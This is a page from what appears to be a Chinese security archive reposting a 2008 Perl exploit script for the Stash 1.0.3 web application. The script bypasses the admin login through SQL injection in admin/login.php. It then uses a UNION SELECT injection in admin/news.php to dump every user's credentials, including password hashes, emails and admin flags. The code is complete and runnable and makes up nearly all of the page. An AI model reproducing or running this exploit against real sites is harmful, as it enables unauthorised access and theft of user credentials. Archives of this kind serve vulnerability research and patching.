首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Stash 1.0.3 (SQL) User Credentials Disclosure Exploit
来源:http://gnix.netsons.org 作者:Gnix 发布时间:2008-10-10  
#!/usr/bin/perl -w
#
# User credentials disclosure exploit - stash103exp.pl
#
# Gnix <gnixmail@gmail.com>
# http://gnix.netsons.org
#
# This exploit use an SQL Injection in the file admin/login.php to
# bypass the login, and then an SQL Injection in the admin/news.php
# to extract all the users info. Note: password are crypted with md5.
#
# Output for each user:
# user_id:user_username:user_password:user_key:user_firstname user_lastname:user_email:user_admin
#

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use HTTP::Cookies;


# Variables
my $cjar  = new HTTP::Cookies( file => 'cookies.txt',
                               autosave => 1,
                               ignore_discard => 0);
my $agent = new LWP::UserAgent;
$agent->agent('Lynxy/6.6.6dev.8 libwww-FM/3.14159FM');
 

# Check argv
if(@ARGV != 3) {
  print "[?] Usage  : perl stash103exp.pl <stash_dir_address> <admin_username> <table_prefix>\n";
  print "[?] Example: perl stash103exp.pl http://site/stash/ avril st_\n";
  exit(1);
}


# Authentication
if(!auth($ARGV[0],$ARGV[1])) {
  print "[!] Error during the authentication!\n";
  exit(1);
}


# Extract all the user information
my $info = extract_data($ARGV[0],$ARGV[2]);
if(!$info) {
  print "[!] Error when extracting data!\n";
  exit(1);
}


# Print user information
$_ = $info;
my @users = m/<1>(.+?)<2>/g;
foreach my $user (@users) {
  print $user."\n";
}


exit(0);

###########################################################################



# Login as $ARGV[1] and save the PHPSESSID cookie
sub auth
{
  my $address = shift;
  my $username= shift;

  # Login
  my $response= $agent->post($address.'admin/login.php',
                             {username   => "' OR user_username = '$username",
                              password   => "any",
                              submit    => "Log in"});

  # Save PHPSESSID cookie
  $cjar->extract_cookies($response);

  return $response->is_redirect();
}



# Inject a query through news.php to extract all the info about every user
sub extract_data
{
  my $address  = shift;
  my $prefix  = shift;

  my $query = "-1 UNION SELECT 1 AS news_id, 'Injection' AS news_title,  ".
   "CONCAT('<1>',user_id,':',user_username,':',user_password,':',user_key,".
  "':',user_firstname,' ', user_lastname,':', user_email,':', user_admin,".
  "'<2>') AS news_body, 'Mitnick' AS news_author, NOW() AS news_date, 0  ".
  "AS news_comment FROM ".$prefix."news, ".$prefix."user";

  my $request = new HTTP::Request('GET', $address.'admin/news.php?post='.$query);

  $agent->cookie_jar($cjar);
  my $response= $agent->request($request);

  if($response->is_success()) {
    return $response->content();
  }
  else {
    return undef;
  }
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kusaba <= 1.0.4 Remote Code Ex
·MS Windows GDI+ Proof of Conce
·WinFTP 2.3.0 (PASV mode) Remot
·MS08-066 AFD.sys Local Privile
·NoticeWare E-mail Server 5.1.2
·Yerba SACphp <= 6.3 / Local Fi
·SlimCMS <= 1.0.0 (redirect.php
·Konqueror 3.5.9 (font color) M
·Globsy <= 1.0 Remote File Rewr
·>Microsoft PicturePusher Activ
·LokiCMS <= 0.3.4 (index.php pa
·GuildFTPd 0.999.8.11/0.999.14
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved